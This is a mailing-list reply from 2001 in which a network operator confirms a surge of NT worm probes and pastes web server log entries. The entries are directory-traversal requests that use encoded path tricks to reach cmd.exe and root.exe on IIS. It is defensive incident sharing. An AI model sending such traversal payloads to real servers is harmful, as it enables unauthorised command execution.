nanog mailing list archives

Re: Worm probes

From: ravi pina <ravi () cow org>
Date: Tue, 18 Sep 2001 10:01:23 -0400


On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma () pair com said at one point in time:



Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
probes this morning?  We're seeing about 8000/second, starting around 9:15
Eastern time, to and from a wide variety of addresses.


affirmative.  i just looked at my logs, and it looks like
each probe tries a bunch of things.  i haven't seen much
on the lists, but i'm looking right now.

owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 
"-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" 
"-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 
271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 
271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 
271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 
271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 
279 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 
"-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 
271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 
"-" "-"


-- 
echo "send pgp key" | mail ravi () cow org
"It's like everybody's trying to find a reason for the shootings. Whatever
 happened to 'crazy?'" -- Chris Rock's explanation for the Littelton, CO.,
                       school shootings, quoted in The Dallas Morning News.

Current thread:

Worm probes sigma (Sep 18)
- Re: Worm probes ravi pina (Sep 18)
  - Re: Worm probes deeann mikula (Sep 18)
    - Re: Worm probes up (Sep 18)
    - Re: Worm probes Bryan Heitman (Sep 18)
    - Re: Worm probes Valdis . Kletnieks (Sep 18)
    - Re: Worm probes Eric Gauthier (Sep 18)
    - Re: Worm probes.. Looking for captures. Michael Airhart (Sep 18)
    - Re: Worm probes Chris Grout (Sep 18)
    - Re: Worm probes ravi pina (Sep 18)
    - RE: Worm probes Mark Radabaugh - Amplex (Sep 18)
    - RE: Worm probes Mark Radabaugh - Amplex (Sep 18)

(Thread continues...)